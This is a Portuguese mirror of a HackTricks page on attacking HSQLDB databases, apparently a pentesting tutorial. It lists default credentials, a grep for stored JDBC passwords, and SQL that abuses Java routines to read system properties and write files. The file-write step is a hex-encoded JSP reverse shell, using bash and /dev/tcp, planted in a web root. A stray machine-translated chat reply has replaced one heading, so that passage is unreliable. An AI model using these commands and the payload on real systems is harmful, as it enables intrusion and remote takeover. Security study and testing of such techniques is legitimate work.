mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-23 11:33:29 +00:00
81 lines
5 KiB
Markdown
81 lines
5 KiB
Markdown
# Informações Básicas
|
|
|
|
HSQLDB (\[HyperSQL DataBase\](http://hsqldb.org/)) é o principal sistema de banco de dados relacional SQL escrito em Java. Ele oferece um mecanismo de banco de dados pequeno, rápido, multithreaded e transacional com tabelas em memória e baseadas em disco e suporta modos incorporados e de servidor.
|
|
|
|
**Porta padrão:** 9001
|
|
```text
|
|
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
|
|
```
|
|
# Informação
|
|
|
|
### Configurações Padrão
|
|
|
|
Observe que por padrão este serviço provavelmente está sendo executado na memória ou está vinculado ao localhost. Se você o encontrou, provavelmente explorou outro serviço e está procurando escalar privilégios.
|
|
|
|
As credenciais padrão geralmente são `sa` com uma senha em branco.
|
|
|
|
Se você explorou outro serviço, procure por possíveis credenciais usando
|
|
```text
|
|
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
|
|
```
|
|
Observe cuidadosamente o nome do banco de dados - você precisará dele para se conectar.
|
|
|
|
# Coleta de informações
|
|
|
|
Conecte-se à instância do banco de dados baixando o HSQLDB (https://sourceforge.net/projects/hsqldb/files/) e extraindo `hsqldb/lib/hsqldb.jar`. Execute o aplicativo GUI (eww) usando `java -jar hsqldb.jar` e conecte-se à instância usando as credenciais descobertas/frágeis.
|
|
|
|
Observe que a URL de conexão parecerá algo como isto para um sistema remoto: `jdbc:hsqldb:hsql://ip/DBNAME`.
|
|
|
|
# Truques
|
|
|
|
## Rotinas de Linguagem Java
|
|
|
|
Podemos chamar métodos estáticos de uma classe Java a partir do HSQLDB usando Rotinas de Linguagem Java. Observe que a classe chamada precisa estar no classpath da aplicação.
|
|
|
|
JRTs podem ser `funções` ou `procedimentos`. As funções podem ser chamadas por meio de declarações SQL se o método Java retornar uma ou mais variáveis primitivas compatíveis com SQL. Elas são invocadas usando a declaração `VALUES`.
|
|
|
|
Se o método Java que queremos chamar retornar void, precisamos usar um procedimento invocado com a declaração `CALL`.
|
|
|
|
## Lendo Propriedades do Sistema Java
|
|
|
|
Crie a função:
|
|
```text
|
|
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
|
|
DETERMINISTIC NO SQL
|
|
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
|
|
```
|
|
Desculpe, não entendi o que você quer dizer com "Execute function:". Poderia me dar mais contexto ou informações?
|
|
```text
|
|
VALUES(getsystemproperty('user.name'))
|
|
```
|
|
Você pode encontrar uma [lista de propriedades do sistema aqui](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
|
|
|
|
## Escrevendo conteúdo em um arquivo
|
|
|
|
Você pode usar o gadget Java `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` localizado no JDK \(carregado automaticamente no classpath da aplicação\) para escrever itens codificados em hexadecimal no disco por meio de um procedimento personalizado. **Observe o tamanho máximo de 1024 bytes**.
|
|
|
|
Crie o procedimento:
|
|
```text
|
|
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
|
|
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
|
|
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
|
|
```
|
|
Executar procedimento:
|
|
```text
|
|
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
|
|
```
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|